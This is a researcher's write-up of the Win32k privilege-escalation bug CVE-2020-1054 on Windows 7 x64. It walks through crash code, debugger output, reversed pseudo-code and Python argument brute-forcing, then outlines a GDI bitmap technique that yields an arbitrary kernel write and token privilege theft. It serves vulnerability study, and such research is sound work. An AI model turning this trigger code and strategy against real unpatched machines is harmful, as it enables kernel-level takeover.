This post is an analysis of the May 2020 security vulnerability identified by CVE-2020-1054. The bug is an elevation of privilege in Win32k. The bug was reported by Netanel Ben-Simon and Yoav Alon from Check Point Research as well as bee13oy of Qihoo 360 Vulcan Team. I highly recommend viewing Netanel and Yoav’s talk from OffensiveCon20 Bugs on the Windshield: Fuzzing the Windows Kernel, which provides insight into how they found this and other bugs.

The remainder of this post will follow the steps I took to analyze the bug and write a proof of concept exploit targeting Windows 7 x64 (fully patched until Microsoft stopped supporting it).


The Crash

Netanel and Yoav kindly provided crash code. This code was a great starting point and I did not do any patch diffing. Patch diffing can still be very useful under these circumstances, however I found it unnecessary in this case.

The provided crash code:

int main(int argc, char *argv[])
{
    LoadLibrary("user32.dll");
    HDC r0 = CreateCompatibleDC(0x0);
    // CPR's original crash code called CreateCompatibleBitmap as follows
    // HBITMAP r1 = CreateCompatibleBitmap(r0, 0x9f42, 0xa);
    // however all following calculations/reversing in this blog will 
    // generally use the below call, unless stated otherwise
    // this only matters if you happen to be following along with WinDbg
    HBITMAP r1 = CreateCompatibleBitmap(r0, 0x51500, 0x100);
    SelectObject(r0, r1);
    DrawIconEx(r0, 0x0, 0x0, 0x30000010003, 0x0, 0xfffffffffebffffc, 
        0x0, 0x0, 0x6);

    return 0;
}

Reviewing the documentation for CreateCompatibleBitmap and DrawIconEx is suggested.

My first step was to rewrite the code in Rust and run it on a Windows 7 x64 box. Below is a snippet of the WinDbg bugcheck analysis:

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: fffff904c7000240, memory referenced.
Arg2: 0000000000000000, value 0 = read operation, 1 = write operation.
Arg3: fffff960000a5482, If non-zero, the instruction address which referenced 
    the bad memory address.
Arg4: 0000000000000005, (reserved)

Some register values may be zeroed or incorrect.
rax=fffff900c7000000 rbx=0000000000000000 rcx=fffff904c7000240
rdx=fffff90169dd8f80 rsi=0000000000000000 rdi=0000000000000000
rip=fffff960000a5482 rsp=fffff880028f3be0 rbp=0000000000000000
 r8=00000000000008f0  r9=fffff96000000000 r10=fffff880028f3c40
r11=000000000000000b r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0         nv up ei ng nz na po cy
win32k!vStrWrite01+0x36a:
fffff960`000d5482 418b36   mov esi,dword ptr [r14] ds:00000000`00000000=????????

STACK_TEXT:  
nt!RtlpBreakWithStatusInstruction
nt!KiBugCheckDebugBreak+0x12
nt!KeBugCheck2+0x722
nt!KeBugCheckEx+0x104
nt!MmAccessFault+0x736
nt!KiPageFault+0x35c
win32k!vStrWrite01+0x36a
win32k!EngStretchBltNew+0x171f
win32k!EngStretchBlt+0x800
win32k!EngStretchBltROP+0x64b
win32k!BLTRECORD::bStretch+0x642
win32k!GreStretchBltInternal+0xa43
win32k!BltIcon+0x18f
win32k!DrawIconEx+0x3b7
win32k!NtUserDrawIconEx+0x14d
nt!KiSystemServiceCopyEnd+0x13
USER32!ZwUserDrawIconEx+0xa
USER32!DrawIconEx+0xd9
cve_2020_1054!CACHED_POW10 <PERF> (cve_2020_1054+0x106d)

The crash happens at win32k!vStrWrite01+0x36a on the instruction mov esi,dword ptr [r14]. Setting a breakpoint on this instruction yields the following:

image 1

It is clear that the crash occurs due to an invalid memory reference. This matches the WinDbg bugcheck analysis. CheckPoint Research tweeted about this vulnerability, describing it as an out-of-bounds (OOB) write.

I will work under the assumption that this value (fffff904'c7000240 in the crash) is what can be controlled for the OOB write. Note that the value c7000240 will be continually referenced to throughout the blog post. This value changes across system reboots and sometimes per program execution, however for the sake of continuity will remain the same.


Controlling OOB Write

The first goal is to understand how the address fffff904'c7000240 can be controlled, which will be referred to as oob_target. To accomplish this, the relevant parts of vStrWrite01 need to be reversed. Working backwards from mov esi,dword ptr [r14], r14 is set with lea r14, [rcx + rax*4]:

image 2

Working further backwards rcx is initialized in one of the first basic blocks of vStrWrite01. After that, rcx is manipulated in a loop:

image 3

rcx is added to by a constant value in the loop. Looking at the assembly this is add ecx, eax. A psuedo-code loop snippet:

var_64h = 0x7fffffff; 
var_6ch = 0x80000000;
while ( r11d )
{
    --r11d;
    if ( ebp >= var_6ch && ebp < var_6ch )
    {
        // oob read/write in here
    }
    ++ebp;
    ecx += eax;
}

With this information a rough formula arises for oob_target:

oob_target = initial_value + loop_iterations * eax

The next logical step is to determine what controls the number of loop iterations. Reviewing the assembly, ebp is set via the following instructions:

mov rsi, rcx // rcx is still arg0 here
...
mov ebp, [rsi]

ebp is set to the first dword of arg0 of vStrWrite01. Dumping the content of rcx at the top of vStrWrite01:

win32k!vStrWrite01:
fffff960`00165118 4885d2          test    rdx,rdx
kd> dd rcx L2
fffff900`c4c76eb0  fff2aaab 0006aaab

fff2aaab is not identical, but it gives the feeling that it is related to arg5 of DrawIconEx. Changing the value from 0xfebffffc to 0xfebffffd:

win32k!vStrWrite01:
fffff960`00165118 4885d2          test    rdx,rdx
kd> dd rcx L2
fffff900`c2962eb0  fff2aaac 0006aaaa

The result is fff2aaac. This indicates that it is related.

Altering arg5 and observing the changes to oob_target provides additional insight.

If arg5 = 0xff000000 there is a minor change to oob_target:

win32k!vStrWrite01+0x31d:
fffff960`00165435 3b6c246c        cmp     ebp,dword ptr [rsp+6Ch]
kd> dq rcx
fffff903`c7000240  ????????`???????? ????????`????????

If arg5 = 0xfd00000 there is a major change to oob_target:

win32k!vStrWrite01+0x31d:
fffff960`00165435 3b6c246c        cmp     ebp,dword ptr [rsp+6Ch]
kd> dq rcx
fffff90a`c7000240  ????????`???????? ????????`????????

Interestingly, no matter the value of arg5 the lower 32 bits of oob_target remains c7000240. Additionally, a decrease in the value of arg5 (treating as unsigned) results in an increase in oob_target.

eax in the oob_target formula is set via an offset from r15:

image 4

Offsets from r15 are commonly used in the beginning of vStrWrite01. This indicates that r15 could contain the address to some structure. In the second basic block of the function r15 is set as follows:

mov r15, r8 // r8 is still arg2 here

r15 is set to arg2 of vStrWrite01. Dumping arg2 at the start of the function:

image 5

The two red boxes mark values that are known. The first red box is arg1 (bitmap width 0x51500) and arg2 (bitmap height 0x100) passed to CreateCompatibleBitmap. The second red box marks a value, c7000240, that has been seen multiple times. This is the lower 32 bits of oob_target. Lastly, the blue box marks eax in the oob_target formula.

The above memory layout within the context of Win32k bitmaps may look familiar, and indeed it is two adjecent structures, BASEOBJECT and SURFOBJ, that are well known in Windows kernel exploit development. In other words, the first red box is SURFOBJ.sizlBitmap, the second red box is SUFOBJ.pvScan0, and the blue box is SURFOBJ.lDelta. More information on these structures is available here. This is a critical piece of information that will be utilized later.

The next step, however, is to fully understand how iterations from the oob_target formula is controlled via arg5 of DrawIconEx. Determining this information follows a similar process as used above, but with additional steps. For this reason, only the results will be shared. The relevant function, vInitStrDDA in the notes.txt file of my GitHub repo contains extra detail.

DrawIconEx arg5’s control of loop_iterations is determined by the following formula (written in Python):

# arg5 of DrawIconEx()
arg5 = 0xffb00000
# arg1 of CreateCompatibleBitmap()
arg1 = 0x51500

loop_iterations = ((1 - arg5) & 0xffffffff) // 0x30

lDelta = arg1 // 8

oob = loop_iterations * lDelta     
upper32_inc = oob & 0xffffffff00000000

print("loop_iterations          = %x" % loop_iterations)
print("lDelta                   = %x" % lDelta)
print("upper 32 inc.            = %x" % upper32_inc)

What was discovered was that arg1 of CreateCompatibleBitmap and arg5 of DrawIconEx directly control the values of both loop_iterations and lDelta. However, the lower 32 bits of oob_target always remain the same. This means only the upper 32 bits of the write address are controllable.

The next step is to determine what is written and to what extent it can be controlled. Reviewing the assembly of vStrWrite01 two writes can be performed:

// write 1
win32k!vStrWrite01+0x417
mov     dword ptr [r14],esi
// write 2
win32k!vStrWrite01+0x461
mov     dword ptr [r14],esi

The content of esi is determined by either of the following:

image 5

esi is either bitwise OR’d or bitwise AND’d with some value.

Running the crash code calls DrawIconEx as:

DrawIconEx(r0, 0x0, 0x0, 0x30000010003, 0x0, 0xfffffffffebffffc,
        0x0, 0x0, 0x6);

Using this call to DrawIconEx the path to the bitwise AND is always taken. Because esi is set via bitwise operations, the diFlags (arg8) parameter of the DrawIconEx stands out to me. The current call sets this parameter to 0x6. Reviewing the documentation for this flag shows that 0x6 is equivalent to DI_IMAGE which “Draws the icon or cursor using the image”. The flag DI_MASK sounds promising, and sure enough setting diFlags (arg8) to 0x1 changes execution flow to the OR branch.

Exploitation Strategy

Now that the capabilities of the OOB write are understood it is time to develop an exploitation strategy. The capabilites are a far cry from an all powerful write-what-where, however in situations like these I like to recall that it is possible to exploit a single byte NULL overflow.

At this point I strongly suggest reviewing/reading Abusing GDI Reloaded and Abusing GDI for ring0 exploit primitives. A brief explanation of these papers follows.

The SURFOBJ struct contains useful members such as pvScan01 and sizlBitmap. pvScan01 points to the actual bitmap data. This data can be read/written to using GetBitmapBits and SetBitMapBits. sizlBitMap is two dwords that contain the height and width of the bitmap. Clasically, two SURFOBJ structures are utilized. A write-what-where is used to overwrite the first SURFOBJ’s (referred to as Manager) pvScan01 with the value of the second SURFOBJ’s (referred to as Worker) pvScan01 address. This then allows a reusable/relocatable write-what-where primitive. The capabilities of this OOB write are listed as:

what is a value either bitwise OR'd or AND'd
where is a value >= fffff901'c7000240

Obviously this does not meet the classical requirements. Fortunately, there is another option taking advantage of sizlBitmap. On Windows 7 (and older versions of Windows 10) the SURFOBJs and their pvScan01 member contents are laid out contiguously. This means that if it is possible to increase either the width or height of sizlBitmap it will be possible to write out-of-bounds of the SURFOBJ’s pvScan01 using a call to SetBitMapBits. If a second SURFOBJ is allocated after the first SURFOBJ, this object’s pvScan01 address can be overwritten. This second SURFOBJ can then be used via SetBitMapBits for a powerful write-what-where primitive.

Taking all the information learned up to this point a rough exploitation strategy can be formulated.

1. Allocate a base bitmap (fffff900'c700000).
2. Allocate enough SURFOBJs (via calls to CreateCompatibleBitmap) such that 
   one is allocted at fffff901'c7000000.
2.1. A second is allocated directly after the first.
2.2. A third is allocated directly after the second.
2. Calculate loop_iterations*lDelta such that it is equal to fffff901'c7000240.
3. Use OOB write to overwrite width or height of second SURFOBJ's sizlBitmap.
4. Use SetBitMapBits with second SURFOBJ to overwrite pvScan01 of third SURFOBJ.
5. Arbitrary reusable write is now obtained.
6. Typical EoP overwrite process token privileges and inject into winlogon.exe.

A bad visual represenation:

image 6

Every step is easily accomplished with the exception of step 3. The ‘what’ part of the write is not a problem. As seen earlier it is possible to perform a bitwise OR. This is guaranteed to increase the OR’d value, which is what is required. Accurately targeting width or height of sizlBitmap is the challenge. It may be recalled in the start of the blog post oob_target is set via lea r14, [rcx + rax*4]. Up to this point, rax has been ignored. Now that an attack strategy is created, it is time to see how rax can be controlled to grant greater control of the OOB write.

Testing different parameters of DrawIconEx revealed that arg1 determines the value of rax. rax is then divided by 0x20:

image 7

This provides the ability to set an offset from the start of the lower 32 bits where

offset = (arg1 // 0x20 ) * 0x4 + 0x240

Testing arguments to DrawIconEx with breakpoints on both mov dword ptr [r14],esi instructions also uncovered useful information. arg2 of DrawIconEx controls the number of iterations through a loop where writes are performed on the bitmap data. For example, if 0x5 is passed as arg2, then 0x5 sets of writes are executed:

image 8

The difference between sets of writes is equivalent to an earlier variable, lDelta. This can be written in psuedo code as:

intial_value = 0xfffff901`c7000240 + (arg1 // 0x20) * 0x4;
loop_count = 0;
while(arg2) 
{
    write_location_1 = intial_value + lDelta * loop_count;
    write location_2 = write_location_1 + 4;
    --arg2;
    ++loop_count;
}

Effectively, three values need to be solved for such that at some point through the loop write_location_1 and write_location_2 land on surfobj1’s csizlBitmap. The three values are arg1, arg2 and lDelta (width of bitmap // 8).

This can be bruteforced with ugly Python:

print("bruting function arguments...") 

# start with size at 0x50000 
for size in range(0x50000, 0xffffff):
    lDelta = size // 0x8 
    # lDelta is always byte alligned so ignore if not
    if lDelta & 0x0f == 0:
        for arg1 in range(0x0, 0xfff, 0x20):
            offset = (arg1 // 0x20) * 0x4 + 0x240
            for arg2 in range(0x0,0x10):
                write_target = offset + arg2 * lDelta
                if write_target == 0x70038:
                    print("found: size {:x}, offset (arg1) {:x}, lDelta {:x}, \
                    loop_count (arg2) {:x}".format(size, arg1, lDelta, arg2))

Now that all values are understood, all that remains is to write the exploit code.


Exploitation Code

Exploitation code is available on my GitHub. Demoing the exploit:

image 9

Windows 7 KB

Testing the exploit on Windows 7 has proved to be very reliable. However, there is room for improvment to make memory calculations completely generic. While testing, I found that a certain Windows KB modified the SURFOBJ struct slightly. Essentially, instead of the offset being 0x240 it is 0x238. Within the exploit code are 2 comments that mark what value to use depending if the Windows 7 host is pre- or post-KB. I have narrowed down the KBs and will update with the exact KB later.


Thanks to Netanel Ben-Simon, Yoav Alon and bee130y for finding the bug: